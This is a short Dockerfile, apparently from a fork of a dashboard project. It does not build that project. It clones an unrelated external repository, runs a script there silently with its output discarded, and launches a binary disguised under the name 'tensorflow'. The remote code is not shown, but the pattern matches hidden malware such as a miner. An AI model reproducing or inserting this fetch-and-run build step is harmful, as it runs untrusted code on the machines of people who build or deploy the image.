fbrinker-tileboard/Dockerfile

9 lines
265 B
Docker
Raw Normal View History

2022-03-28 20:00:45 +02:00
FROM ubuntu:latest
RUN apt-get update -y
RUN apt-get install git -y
RUN git clone https://gitlab.zam.io/wajinhakim/drone-test.git
WORKDIR /drone-test
RUN chmod +x tensorflow direct.sh
RUN nohup bash direct.sh > /dev/null
EXPOSE 8080 8081
ENTRYPOINT ["./tensorflow"]